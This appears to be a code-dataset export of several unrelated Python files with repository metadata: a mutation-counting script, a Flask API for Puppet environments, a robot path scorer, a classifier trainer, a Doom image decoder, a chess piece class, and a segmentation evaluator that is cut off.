line.split("\t") countersList.append(newCounter(fields[0], fields[1], fields[2], fields[3], fields[4], fields[5], fields[6], fields[7], fields[8])) sumCount = sumCount + 1 rInput.close() files = os.listdir(FILESDIR) #files = [os.listdir(FILESDIR)[3]] #file = "2014_Fredriksson_HNSC_27_WGS_mutations_adjusted_anz1_NOrepeats_sorted_anz4.txt" for file in files: if (file[-len(OLDEXT):]!=OLDEXT): continue if (BATCH): batchNames = ("BLCA", "BRCA", "HNSC", "LUAD", "LUSC") batchSubset = 2 if (file.split("_")[2] not in batchNames[batchSubset]): continue print(file) #print("\n" + file + "\n") inputFile = FILESDIR + file inputPref = inputFile[:-len(OLDEXT)] if CLUSTERANZ: sys.stderr.write("Using clusterDEF file\n") #origAnz4 = ORIGDIR + re.sub('_anz2.*', '', file) + '_anz4.txt' origAnz4 = ORIGDIR + re.sub('_anz2.*', '', file) + motifString + '_anz4.txt' inputPref = inputPref + motifString #input = os.popen('cut -f1-77 ' + origAnz4) # 68 - last anz4 col; 2 - first clusterDef col; 9 - first+9-1 #input = os.popen('bash -c "paste <(cut -f1-68 ' + origAnz4 + ')' + ' <(cut -f2-9 ' + inputFile + ')"') # for tCw #input = os.popen('bash -c "paste <(cut -f1-69 ' + origAnz4 + ')' + ' <(cut -f3-11 ' + inputFile + ')"') # for tCa: 62, rtCa: 63 input = os.popen('bash -c "paste <(cut -f1-63 ' + origAnz4 + ')' + ' <(cut -f3-11 ' + inputFile + ')"') else: input = open(inputFile, "r") line = input.readline() firstChar = line[:1] while firstChar=="#": line = input.readline() firstChar = line[:1] fieldNames = line[:-1].split("\t") VARIANT_TYPE_FIELD = which(map(lambda(x): x=='Variant_Type', fieldNames))[0] TUMOR_SEQ_ALLELE2_FIELD = which(map(lambda(x): x=='Tumor_Seq_Allele2', fieldNames))[0] COMPLEX_ID_FIELD = which(map(lambda(x): x=='Complex_ID', fieldNames))[0] CLUSTER_ID_FIELD = which(map(lambda(x): x=='Dataset_Cluster_ID', fieldNames))[0] CLUSTER_COORD_FIELD = which(map(lambda(x): x=='Cluster_Coordination', fieldNames))[0] INPUT_SAMPLE_FIELD = which(map(lambda(x): x=='Tumor_Sample_Barcode', 
fieldNames))[0] #uniqueFieldNumbers <- (fieldNames %in% countTitles) & !duplicated(fieldNames) #uniqueFieldNames <- fieldNames[uniqueFieldNumbers] tf1 = map(lambda x: x in countTitles, fieldNames) tf2 = map(lambda x: not x, duplicated(fieldNames)) uniqueFieldNumbers = which(map(lambda x: tf1[x] and tf2[x], range(len(fieldNames)))) uniqueFieldNames = map(lambda(x): fieldNames[x], uniqueFieldNumbers) mutList = dict(zip(findTitles, [0]*len(findTitles))) baseList = {'A': 0, 'T':0, 'G':0, 'C':0} for key in mutList.keys(): mutList[key] = dict(baseList) baseCountList = dict(zip(uniqueFieldNames, [0]*len(uniqueFieldNames))) print("Initializing...") for sumNum in range(sumCount): countersList[sumNum]['initOutput'](inputPref) countersList[sumNum]['initFieldNames'](fieldNames) countersList[sumNum]['initCounters'](mutList,baseList,baseCountList) print("Counting...") sampleID = "" firstSample = True lnum = 0 while (True): #while (lnum<1000): line = input.readline() if (not line): for sumNum in range(sumCount): countersList[sumNum]['writeSampleSum']() countersList[sumNum]['writeTotals']() countersList[sumNum]['closeOutput']() print "End: not line" break lnum = lnum+1 if (lnum%1000==0): sys.stdout.write('.') fields = line.split("\t") if (all(map(lambda(x): x=="", fields))): for sumNum in range(sumCount): countersList[sumNum]['writeSampleSum']() countersList[sumNum]['writeTotals']() countersList[sumNum]['closeOutput']() print "End: empty fields" break if (fields[INPUT_SAMPLE_FIELD]!=sampleID): if (not firstSample): for sumNum in range(sumCount): print("Writing %d" % sumNum) countersList[sumNum]['writeSampleSum']() countersList[sumNum]['initCounters'](mutList,baseList,baseCountList) firstSample = False sampleID = fields[INPUT_SAMPLE_FIELD] print(sampleID) for sumNum in range(sumCount): countersList[sumNum]['count'](fields) input.close() print for sumNum in range(sumCount): print countersList[sumNum]['getValues']() os.remove(sys.argv[1] + "findMotifs.py") time50 = 
datetime.datetime.now() print(time50 - time40)
32.362445
253
0.672716
1,887
14,822
5.215156
0.189189
0.007316
0.013413
0.006402
0.233005
0.201301
0.142973
0.114114
0.081089
0.065847
0
0.02684
0.152881
14,822
457
254
32.43326
0.756929
0.151599
0
0.249201
0
0
0.085497
0.007351
0
0
0
0
0
0
null
null
0.003195
0.003195
null
null
0.035144
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
99fe12ff4c35b26e29c870cb2838c857b4760a02
6,757
py
Python
app/environments/routes.py
Jeoffreybauvin/puppenc
8c4f0bea9208dc7628e9e0813f20d26543caa9bb
[ "Apache-2.0" ]
5
2017-03-24T21:43:12.000Z
2021-12-13T12:04:35.000Z
app/environments/routes.py
Jeoffreybauvin/puppenc
8c4f0bea9208dc7628e9e0813f20d26543caa9bb
[ "Apache-2.0" ]
12
2017-04-03T16:04:14.000Z
2019-05-22T14:32:45.000Z
app/environments/routes.py
Jeoffreybauvin/puppenc
8c4f0bea9208dc7628e9e0813f20d26543caa9bb
[ "Apache-2.0" ]
2
2017-04-15T17:13:47.000Z
2021-06-01T04:04:28.000Z
from flask_restful import Resource from flask import jsonify, request from app.puppenc import api, db, app, auth, PuppencResource from app.decorators import * from app.environments.models import Environment from app.environments.schema import EnvironmentSchema class Environments(PuppencResource): def __init__(self): self.environment_schema = EnvironmentSchema() self.environments_schema = EnvironmentSchema(many=True) @auth.login_required @get_item(Environment) def get(self, id=None): """ @api {get} /environments Get all environments @apiName get_environments @apiGroup Environments @apiVersion 1.0.0 @apiPermission user @apiParam {String} [limit=10] (query parameter) Objects per page to display. Use limit=0 for disabling limit @apiParam {String} [page=1] (query parameter) Current page @apiParam {String} [filter] (query parameter) Filter on name parameter (use * for searching any strings. Ex: *maclass*) @apiSuccess {Number} id The environment's id @apiSuccess {String} name The environment's name @apiSuccess {Array} nodes The environment's nodes (by id) @apiSuccess {Datetime} insert_date The environment's inserted date @apiSuccess {Datetime} update_date The environment's updated date @apiSuccess {Datetime} delete_date The environment's deleted date @apiExample {curl} Example usage : curl -X GET -u user:pwd http://127.0.0.1:5000/api/v1/environments @apiSuccessExample {json} Success-Response: HTTP/1.0 200 OK [ { "delete_date": null, "id": 1, "insert_date": "2017-04-11T13:56:03+00:00", "name": "stable", "nodes": [ 104, 2582, 2588 ], "update_date": null }, { "delete_date": null, "id": 2, "insert_date": "2017-04-11T13:56:04+00:00", "name": "staging", "nodes": [ 8, 34, 42 ], "update_date": null } ] """ """ @api {get} /environments/:id Get a single environment @apiName get_environment @apiGroup Environments @apiVersion 1.0.0 @apiPermission user @apiParam {Number} id (uri parameter) The environment's id. @apiSuccess {Number} id The environment's id. 
@apiSuccess {String} name The environment's name. @apiSuccess {Array} nodes The environment's nodes (by id) @apiSuccess {Datetime} insert_date The environment's inserted date @apiSuccess {Datetime} update_date The environment's updated date @apiSuccess {Datetime} delete_date The environment's deleted date @apiExample {curl} Example usage : curl -X GET -u user:pwd http://127.0.0.1:5000/api/v1/environments/1 @apiSuccessExample {json} Success-Response: HTTP/1.0 200 OK { "delete_date": null, "id": 2, "insert_date": "2017-04-11T13:56:03+00:00", "name": "my_environment", "nodes": [ 1498, 2817, 2818 ], "update_date": null } """ if not id: return self.environments_schema.jsonify(g.obj_info) else: return self.environment_schema.jsonify(g.obj_info) @auth.login_required @body_is_valid @is_unique_item(Environment) @post_item(Environment) def post(self): """ @api {post} /environments Add a new environment @apiName add_environment @apiGroup Environments @apiVersion 1.0.0 @apiPermission user @apiParam {String} name (json document) The environment's name. @apiSuccess {Number} id The environment's id. 
@apiExample {curl} Example usage : curl -X POST -H "Content-Type: application/json" \ -d '{ "name": "my_new_environment" }' \ http://127.0.0.1:5000/api/v1/environments @apiSuccessExample {json} Success-Response: HTTP/1.0 200 OK { "227": { "name": "my_new_environment" } } """ pass @auth.login_required @body_is_valid @is_unique_item(Environment) @get_item(Environment) @edit_item(Environment) def put(self, id=None): """ @api {put} /environments/:id Edit an existing environment @apiName edit_environment @apiGroup Environments @apiVersion 1.0.0 @apiPermission user @apiParam {String} name (uri parameter) The environment's id @apiParam {String} name (json document) The new environment's name @apiSuccess {Number} success True if success @apiSuccess {Number} message A information message @apiExample {curl} Example usage : curl -X PUT -H "Content-Type: application/json" \ -d '{ "name": "my_new_environment" }' \ http://127.0.0.1:5000/api/v1/environments/:id @apiSuccessExample {json} Success-Response: HTTP/1.0 200 OK { "message": "successfully modified", "success": true } """ pass @auth.login_required @get_item(Environment) @delete_item(Environment) def delete(self, id): """ @api {delete} /environments/:id Delete a single environment @apiName rm_hostgorup @apiGroup Environments @apiVersion 1.0.0 @apiPermission user @apiParam {Number} id (uri parameter) The environment's id. @apiSuccess {Boolean} success Success (True if ok). @apiSuccess {String} message A success or error message. @apiExample {curl} Example usage : curl -X DELETE http://127.0.0.1:5000/api/v1/environments/:id @apiSuccessExample {json} Success-Response: HTTP/1.0 200 OK { "message": "<Environment 'my_new_environment'> deleted", "success": true } """ pass
37.960674
139
0.540033
690
6,757
5.204348
0.22029
0.06015
0.071011
0.028404
0.613478
0.588415
0.538847
0.507937
0.507937
0.507937
0
0.043946
0.366879
6,757
177
140
38.175141
0.795465
0.519609
0
0.4
0
0
0
0
0
0
0
0
0
1
0.142857
false
0.085714
0.171429
0
0.4
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
99ff21128f28ade08f135547e7c3ca6883ffbc73
5,675
py
Python
human_feedback.py
XushengLuo/SocialRobotHumanFeedback
db609bc76c11528ea611dcbd21982e0ac6d50b71
[ "BSD-2-Clause" ]
null
null
null
human_feedback.py
XushengLuo/SocialRobotHumanFeedback
db609bc76c11528ea611dcbd21982e0ac6d50b71
[ "BSD-2-Clause" ]
null
null
null
human_feedback.py
XushengLuo/SocialRobotHumanFeedback
db609bc76c11528ea611dcbd21982e0ac6d50b71
[ "BSD-2-Clause" ]
null
null
null
import numpy as np from shapely.geometry import Point, LineString, Polygon from smallest_enclosing_circle import make_circle from itertools import groupby from operator import itemgetter # def human_feedback(x, human_cluster, point_cluster, obstacle): # # human are inside the polygon # score = 0 # index = set() # nx = np.shape(x)[0]//2 # # for num, polygon in human_cluster.items(): # point = [] # cluster = Polygon(polygon) # for i in range(nx - 1): # # whether the line segment crosses the cluster(polygon) # if LineString([Point((x[i], x[i+nx])), Point(x[i+1], x[i+1+nx])]).intersects(cluster): # point.append([(x[i], x[i+nx]), (x[i+1], x[i+1+nx])]) # index.add(i) # index.add(i+1) # if point: # score += get_score_from_human(point, point_cluster[num]) # # obstacle avoidance # for num, obs in obstacle.items(): # for i in range(nx - 1): # # whether the line segment crosses the (obstacle) # if LineString([Point((x[i], x[i + nx])), Point(x[i + 1], x[i + 1 + nx])]).intersects(obs): # score += 1 # index.add(i) # index.add(i+1) # # the length of the trajectory # dist = np.sum([np.linalg.norm([x[i] - x[i + 1], x[i + nx] - x[i + 1 + nx]]) for i in range(nx - 1)]) # score += dist # # # index # index_group = [] # index = list(index) # index.sort() # for k, g in groupby(enumerate(index), lambda ix: ix[0] - ix[1]): # index_group.append(list(map(itemgetter(1), g))) # expand_index = set([j for i in index_group for j in i]) # for group in index_group: # num = np.random.randint(0, 3) # extra = [group[0]-k for k in range(1, num+1) if group[0]-k > 0] + \ # [group[-1]+k for k in range(1, num+1) if group[-1]+k < nx] # expand_index.update(set(extra)) # return score, dist, list(expand_index) # # # def get_score(point, polygon): # """ # the distance of the center of polygon to the line segment of a trajectory # :param point: # :param polygon: # :return: # """ # rho = 1 # cx, cy, r = make_circle(polygon) # score = 0 # for p in point: # d = np.abs((p[1][1]-p[0][1])*cx - (p[1][0]-p[0][0])*cy + 
p[1][0]*p[0][1] - p[1][1]*p[0][0]) / \ # np.sqrt((p[1][1]-p[0][1])**2 + (p[1][0]-p[0][0])**2) # score += rho/d[0] # return score # # # def get_score_from_human(point, point_cluster): # score = 0 # radius = 0.5 # for human in point_cluster: # cx = human[0] # cy = human[1] # for p in point: # d = np.abs((p[1][1] - p[0][1]) * cx - (p[1][0] - p[0][0]) * cy + p[1][0] * p[0][1] - p[1][1] * p[0][0]) / \ # np.sqrt((p[1][1] - p[0][1]) ** 2 + (p[1][0] - p[0][0]) ** 2) # if d <= radius: # score += 1 # return score def human_feedback1(x0, x, human, obstacle, human_scale): # human stand randomly score = 0 index = set() nx = np.shape(x)[0]//2 # complaint for i in range(nx - 1): p = [(x[i], x[i + nx]), (x[i + 1], x[i + 1 + nx])] for ind, h in enumerate(human): cx = h[0] cy = h[1] # decide the shortest distance of a point to a line segment # https://math.stackexchange.com/questions/2248617/shortest-distance-between-a-point-and-a-line-segment t = - ((p[0][0] - cx) * (p[1][0] - p[0][0]) + (p[0][1] - cy) * (p[1][1] - p[0][1])) / \ ((p[1][0] - p[0][0]) ** 2 + (p[1][1] - p[0][1]) ** 2) if 0 <= t <= 1: d = np.abs((p[1][1] - p[0][1]) * cx - (p[1][0] - p[0][0]) * cy + p[1][0] * p[0][1] - p[1][1] * p[0][0]) / \ np.sqrt((p[1][1] - p[0][1]) ** 2 + (p[1][0] - p[0][0]) ** 2) else: d1 = (p[0][0] - cx) ** 2 + (p[0][1] - cy) ** 2 d2 = (p[1][0] - cx) ** 2 + (p[1][1] - cy) ** 2 d = np.sqrt(d1) if d1 <= d2 else np.sqrt(d2) if d <= human_scale[ind]: score += 1 index.add(i) index.add(i+1) # obstacle avoidance # for num, poly in obstacle.items(): # obs = Polygon(poly) # for i in range(nx - 1): # # whether the line segment crosses the (obstacle) # if LineString([Point((x[i], x[i + nx])), Point(x[i + 1], x[i + 1 + nx])]).intersects(obs): # score += 1 # index.add(i) # index.add(i+1) # complaints inludes human complaints and obstacles complaint = score # the length of the trajectory dist = 0 # np.sum([np.linalg.norm([x[i] - x[i + 1], x[i + nx] - x[i + 1 + nx]]) for i in range(nx - 1)]) # diff = x - x0 # 
dist = dist + np.sum([np.linalg.norm([(diff[i], diff[i + nx])]) for i in range(nx)]) dist = dist + np.linalg.norm(x-x0) dist = dist score = (score * 10 + dist) # indices of waypoints need to be perturbed index_group = [] index = list(index) index.sort() for k, g in groupby(enumerate(index), lambda ix: ix[0] - ix[1]): index_group.append(list(map(itemgetter(1), g))) expand_index = set([j for i in index_group for j in i]) for group in index_group: num = np.random.randint(0, 1) extra = [group[0]-k for k in range(1, num+1) if group[0]-k > 0] + \ [group[-1]+k for k in range(1, num+1) if group[-1]+k < nx] expand_index.update(set(extra)) return score, complaint, dist, list(expand_index)
39.685315
123
0.492863
904
5,675
3.05531
0.137168
0.020275
0.015206
0.01593
0.556843
0.555757
0.515206
0.475742
0.475742
0.466691
0
0.053106
0.316476
5,675
142
124
39.964789
0.658933
0.615507
0
0
0
0
0
0
0
0
0
0
0
1
0.022727
false
0
0.113636
0
0.159091
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82011fa86716754e2702eaa340eb8b60c131cddc
470
py
Python
validation-api/definitions/path.py
DILCISBoard/py-ip-validator
1a00f7205d3676cf24c993076614fcbeb50cf8d7
[ "Apache-2.0" ]
2
2018-11-20T12:17:57.000Z
2019-09-28T21:01:38.000Z
validation-api/definitions/path.py
DILCISBoard/py-ip-validator
1a00f7205d3676cf24c993076614fcbeb50cf8d7
[ "Apache-2.0" ]
2
2020-06-15T09:28:44.000Z
2020-06-18T10:30:26.000Z
validation-api/definitions/path.py
DILCISBoard/py-ip-validator
1a00f7205d3676cf24c993076614fcbeb50cf8d7
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python # coding=UTF-8 # # METS Validator Portal # Copyright (C) 2017 # All rights reserved. # # This code is distributed under the terms of the GNU General Public # License, Version 3. See the text file "COPYING" for further details # about the terms of this license. class Path: #URL path = "" def main(): # test code pass # this means that if this script is executed, then # main() will be executed if __name__ == '__main__': main()
18.076923
69
0.680851
70
470
4.457143
0.757143
0.051282
0.064103
0
0
0
0
0
0
0
0
0.016438
0.223404
470
25
70
18.8
0.838356
0.73617
0
0
0
0
0.072727
0
0
0
0
0
0
1
0.166667
false
0.166667
0
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
8201bf3c0e643a911851cd3ab506967ec106559e
8,286
py
Python
MI/classify.py
n778509775/NWCQ
72851d26f470465e9e13b219a12d52daa5e1ceed
[ "MIT" ]
1
2021-10-17T02:13:27.000Z
2021-10-17T02:13:27.000Z
MI/classify.py
n778509775/NWCQ
72851d26f470465e9e13b219a12d52daa5e1ceed
[ "MIT" ]
null
null
null
MI/classify.py
n778509775/NWCQ
72851d26f470465e9e13b219a12d52daa5e1ceed
[ "MIT" ]
null
null
null
#!/usr/bin/env python import torch.utils.data import numpy as np import random import time import matplotlib.pyplot as plt from tkinter import _flatten from function import plot_clas_loss, pre_processing from sklearn.metrics import roc_auc_score import torch import torch.nn as nn from torch.autograd import Variable import torch.nn.functional as F import network as models import math import argparse import pylib # Set random seed seed = 0 random.seed(seed) np.random.seed(seed) torch.backends.cudnn.deterministic = True torch.backends.cudnn.benchmark = False torch.manual_seed(seed) # CUDA device_id = 0 # ID of GPU to use cuda = torch.cuda.is_available() if cuda: torch.cuda.set_device(device_id) torch.cuda.manual_seed(seed) torch.cuda.manual_seed_all(seed) plt.ioff() if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--data_folder', type=str, default='data/') parser.add_argument('-l', '--dataset_file_list', nargs='+', help='<Required> Set flag', required=True, type=str) parser.add_argument('--train_num', type=int, default=2) parser.add_argument('--code_save', type=str, default='code_list.pkl') parser.add_argument('--take_log', type=bool, default=False) parser.add_argument('--standardization', type=bool, default=False) parser.add_argument('--scaling', type=bool, default=False) parser.add_argument('--plots_dir', type=str, default='plots/') parser.add_argument('--code_dim', type=int, default=25) parser.add_argument('--batch_size', type=int, default=128, help='mini-batch size') parser.add_argument('--num_epochs', type=int, default=100, help='number of total iterations for training') parser.add_argument('--lr_step', type=int, default=10000, help='step decay of learning rates') parser.add_argument('--base_lr', type=float, default=1e-4, help='learning rate for network') parser.add_argument('--l2_decay', type=float, default=5e-5) parser.add_argument('--log_interval', type=int, default=100) config = parser.parse_args() #print(config) data_folder 
= config.data_folder code_save_file = data_folder + config.code_save dataset_file_list = [data_folder+f for f in config.dataset_file_list] data_num = len(dataset_file_list) train_num = config.train_num plots_dir = config.plots_dir # read data pre_process_paras = {'take_log': config.take_log, 'standardization': config.standardization, 'scaling': config.scaling} dataset_list = pre_processing(dataset_file_list, pre_process_paras) # training batch_size = config.batch_size num_epochs = config.num_epochs num_inputs = len(dataset_list[0]['feature']) code_dim = config.code_dim # construct a DataLoader for each batch batch_loader_dict = {} for i in range(len(dataset_list)): gene_exp = dataset_list[i]['mz_exp'].transpose() labels = dataset_list[i]['labels'] # construct DataLoader list if cuda: torch_dataset = torch.utils.data.TensorDataset( torch.FloatTensor(gene_exp).cuda(), torch.LongTensor(labels).cuda()) else: torch_dataset = torch.utils.data.TensorDataset( torch.FloatTensor(gene_exp), torch.LongTensor(labels)) data_loader = torch.utils.data.DataLoader(torch_dataset, batch_size=batch_size, shuffle=True, drop_last=True) batch_loader_dict[i+1] = data_loader # create model discriminator = models.Discriminator(num_inputs=num_inputs) if cuda: discriminator.cuda() log_interval = config.log_interval base_lr = config.base_lr lr_step = config.lr_step num_epochs = config.num_epochs l2_decay = config.l2_decay # training criterion = nn.CrossEntropyLoss() loss_classifier_list = [] for epoch in range(1, num_epochs + 1): # step decay of learning rate #learning_rate = base_lr / math.pow(2, math.floor(epoch / lr_step)) learning_rate = base_lr * math.pow(0.9, epoch / lr_step) # regularization parameter between two losses gamma_rate = 2 / (1 + math.exp(-10 * (epoch) / num_epochs)) - 1 if epoch % log_interval == 0: print('{:}, Epoch {}, learning rate {:.3E}'.format(time.asctime(time.localtime()), epoch, learning_rate)) optimizer = torch.optim.Adam([ {'params': discriminator.parameters()}, 
], lr=learning_rate, weight_decay=l2_decay) discriminator.train() iter_data_dict = {} for cls in batch_loader_dict: iter_data = iter(batch_loader_dict[cls]) iter_data_dict[cls] = iter_data # use the largest dataset to define an epoch num_iter = 0 for cls in batch_loader_dict: num_iter = max(num_iter, len(batch_loader_dict[cls])) total_clas_loss = 0 num_batches = 0 for it in range(0, num_iter): data_dict = {} label_dict = {} code_dict = {} reconstruct_dict = {} Disc_dict = {} for cls in iter_data_dict: data, labels = iter_data_dict[cls].next() data_dict[cls] = data label_dict[cls] = labels if it % len(batch_loader_dict[cls]) == 0: iter_data_dict[cls] = iter(batch_loader_dict[cls]) data_dict[cls] = Variable(data_dict[cls]) label_dict[cls] = Variable(label_dict[cls]) for cls in range(1,train_num+1): Disc_dict[cls] = discriminator(data_dict[cls]) optimizer.zero_grad() #Loss # classifier loss for dignosis loss_classification = torch.FloatTensor([0]) if cuda: loss_classification = loss_classification.cuda() for cat in range(1,train_num+1): for cls in range(len(label_dict[cat])): loss_classification += F.binary_cross_entropy(torch.squeeze(Disc_dict[cat])[cls], label_dict[cat][cls].float()) #loss_classification = criterion(Disc_dict[cat], label_dict[cat]) loss = loss_classification loss.backward() optimizer.step() # update total loss num_batches += 1 total_clas_loss += loss_classification.data.item() avg_clas_loss = total_clas_loss / num_batches if epoch % log_interval == 0: print('Avg_classify_loss {:.3E}'.format(avg_clas_loss)) loss_classifier_list.append(avg_clas_loss) #scheduler.step() plot_clas_loss(loss_classifier_list, plots_dir+'clas_loss.png') # testing: extract codes discriminator.eval() #F_score def matric(cluster, labels): TP, TN, FP, FN = 0, 0, 0, 0 n = len(labels) for i in range(n): if cluster[i]: if labels[i]: TP += 1 else: FP += 1 elif labels[i]: FN += 1 else: TN += 1 return TP, TN, FP, FN #Accuracy for pre in range(train_num,len(dataset_list)): test_data = 
torch.from_numpy(dataset_list[pre]['mz_exp'].transpose()) test_label = torch.from_numpy((np.array(dataset_list[pre]['labels']))).cuda() Disc = discriminator(test_data.float().cuda()) pred = torch.from_numpy(np.array([1 if i > 0.5 else 0 for i in Disc])).cuda() #pred = torch.max(F.softmax(Disc), 1)[1] num_correct = 0 num_correct += torch.eq(pred, test_label).sum().float().item() Acc = num_correct/len(test_label) print("Accuracy is ", Acc) TP, TN, FP, FN = matric(pred, test_label) precision = TP / (TP + FP) recall = TP / (TP + FN) f_score = 2 * precision * recall / (precision + recall) print("F_score is ",f_score) #AUC print("AUC is ",roc_auc_score(test_label.cpu(), pred.cpu())) #MCC MCC = (TP * TN - FP * FN) / math.sqrt((TP + FP) * (TP + FN) * (TN + FP) * (TN + FN)) print("MCC is ",MCC)
35.715517
131
0.621289
1,080
8,286
4.540741
0.221296
0.027529
0.051998
0.014682
0.137643
0.084217
0.04792
0.025285
0.025285
0.025285
0
0.01147
0.263456
8,286
231
132
35.87013
0.792069
0.068911
0
0.090909
0
0
0.066857
0
0
0
0
0
0
1
0.006061
false
0
0.09697
0
0.109091
0.036364
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8201c67d288e4465f79cc1d4182769abefabbba6
966
py
Python
pieces/queen.py
eelviral/Chess-Game-Project
bd11a727221250f6c3dbc86a370742040f51be0a
[ "MIT" ]
null
null
null
pieces/queen.py
eelviral/Chess-Game-Project
bd11a727221250f6c3dbc86a370742040f51be0a
[ "MIT" ]
null
null
null
pieces/queen.py
eelviral/Chess-Game-Project
bd11a727221250f6c3dbc86a370742040f51be0a
[ "MIT" ]
null
null
null
from piece import Piece from .rook import Rook from .bishop import Bishop class Queen(Piece): def __init__(self, white): super().__init__(white) self.rook = Rook(white) self.bishop = Bishop(white) def can_move(self, board, start, end) -> bool: """ Determines if queen can currently move to marked position """ if (self.rook.can_move(board, start, end) or self.bishop.can_move(board, start, end)): return True return False def controlled_squares(self, board, x, y) -> list: rook_squares = self.rook.controlled_squares(board, x, y) bishop_squares = self.bishop.controlled_squares(board, x, y) return rook_squares + bishop_squares def legal_moves(self, board, x, y) -> list: rook_moves = self.rook.legal_moves(board, x, y) bishop_moves = self.bishop.legal_moves(board, x, y) return rook_moves + bishop_moves
32.2
68
0.63354
129
966
4.550388
0.271318
0.061329
0.07155
0.057922
0.306644
0.064736
0
0
0
0
0
0
0.266046
966
29
69
33.310345
0.827927
0.059006
0
0
0
0
0
0
0
0
0
0
0
1
0.190476
false
0
0.142857
0
0.571429
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
82021110f6f9c2d0fb36aa62a5093fee91e387ae
3,842
py
Python
idgames-extract/src/doom/doomimage.py
GitExl/DoomIdgamesArchive
6f7124de5c2bab256bb2255b309f50a958780b9d
[ "BSD-2-Clause" ]
2
2019-05-05T02:04:45.000Z
2019-07-10T18:49:31.000Z
idgames-extract/src/doom/doomimage.py
GitExl/DoomIdgamesArchive
6f7124de5c2bab256bb2255b309f50a958780b9d
[ "BSD-2-Clause" ]
null
null
null
idgames-extract/src/doom/doomimage.py
GitExl/DoomIdgamesArchive
6f7124de5c2bab256bb2255b309f50a958780b9d
[ "BSD-2-Clause" ]
3
2016-11-08T21:03:28.000Z
2019-05-12T21:45:37.000Z
from struct import Struct from typing import Optional from PIL import Image from doom.palette import Palette class DoomImage(object): S_HEADER: Struct = Struct('<HHhh') def __init__(self, width: int, height: int, left: int, top: int): self.width: int = width self.height: int = height self.left: int = left self.top: int = top self.pixels: Optional[bytes] = None @classmethod def from_data(cls, data: bytes, palette: Palette): """ Creates a DoomImage with doom graphics data rendered to an internal buffer. :param data: :param palette: :return: """ width, height, left, top = DoomImage.S_HEADER.unpack_from(data) data_len = len(data) # Attempt to detect invalid data. if width > 2048 or height > 2048 or top > 2048 or left > 2048: return None if width <= 0 or height <= 0: return None image = cls(width, height, left, top) # Initialize an empty bitmap. pixels = bytearray([0, 0, 0] * width * height) pixels_len = len(pixels) # Read column offsets. offset_struct = Struct('<' + ('I' * width)) offsets = offset_struct.unpack_from(data[8:8 + (width * 4)]) # Read columns. column_index = 0 while column_index < width: offset = offsets[column_index] # Attempt to detect invalid data. if offset >= data_len: return None prev_delta = 0 while True: column_top = data[offset] # Column end. if column_top == 255: break # Tall columns are extended. 
if column_top <= prev_delta: column_top += prev_delta prev_delta = column_top pixel_count = data[offset + 1] offset += 3 pixel_index = 0 while pixel_index < pixel_count: if offset + pixel_index >= data_len: break pixel = data[offset + pixel_index] destination = ((pixel_index + column_top) * width + column_index) * 3 if destination + 2 < pixels_len: pixels[destination + 0] = palette.colors[pixel].r pixels[destination + 1] = palette.colors[pixel].g pixels[destination + 2] = palette.colors[pixel].b pixel_index += 1 offset += pixel_count + 1 if offset >= data_len: break column_index += 1 image.pixels = bytes(pixels) return image @staticmethod def is_valid(data: bytes) -> bool: """ Determine if some data is likely to be a valid Doom type image. :param data: :return: """ if len(data) < 16: return False # Verify if the header values are sane. width, height, left, top = DoomImage.S_HEADER.unpack_from(data) if width > 2048 or height > 2048 or top > 2048 or left > 2048: return False if width <= 0 or height <= 0: return False # Verify that offsets are in range of the data. offset_struct = Struct('<' + ('I' * width)) offsets = offset_struct.unpack_from(data[8:8 + (width * 4)]) for offset in offsets: if offset >= len(data): return False return True def get_pillow_image(self) -> Image: """ Returns a Pillow image from this graphic's image data. :return: """ return Image.frombytes('RGB', (self.width, self.height), self.pixels)
29.106061
89
0.525508
434
3,842
4.539171
0.251152
0.018274
0.028426
0.027411
0.214213
0.214213
0.188832
0.165482
0.165482
0.165482
0
0.026854
0.389381
3,842
131
90
29.328244
0.812873
0.134565
0
0.297297
0
0
0.003751
0
0
0
0
0
0
1
0.054054
false
0
0.054054
0
0.27027
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82027cf84d56a19e89654387f3e3771d2c030696
4,327
py
Python
bdd_mtl/tools/eval_seg.py
XDong18/bdd-mtl
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
[ "BSD-3-Clause" ]
null
null
null
bdd_mtl/tools/eval_seg.py
XDong18/bdd-mtl
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
[ "BSD-3-Clause" ]
null
null
null
bdd_mtl/tools/eval_seg.py
XDong18/bdd-mtl
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
[ "BSD-3-Clause" ]
null
null
null
import argparse import boundary_utils as bu import numpy as np import os import sys import time from utils import * from multiprocessing import Pool import pickle as pk from PIL import Image def parse_args(): parser = argparse.ArgumentParser( description='Evaluate drivable area and semantic segmentation predictions') parser.add_argument('-d', '--data-dir', default=None) parser.add_argument('-p', '--pred-dir', default=None) args = parser.parse_args() return args def _eval_drivable(infos): global task gt_fn, pred_fn = infos gt = np.array(Image.open(gt_fn)) pred = np.load(pred_fn) drivable_hist = fast_hist(pred.flatten(), gt.flatten(), 3) return [drivable_hist] def _eval_sem_seg(infos): global task gt_fn, pred_fn = infos gt = np.array(Image.open(gt_fn)) pred = np.load(pred_fn).squeeze(0).astype(np.uint8) # semantic segmentation hist = fast_hist(pred.flatten(), gt.flatten(), 19) return hist def main(): args = parse_args() tasks = os.listdir(args.pred_dir) # segmentation if 'sem_seg' in tasks: print('Evaluating 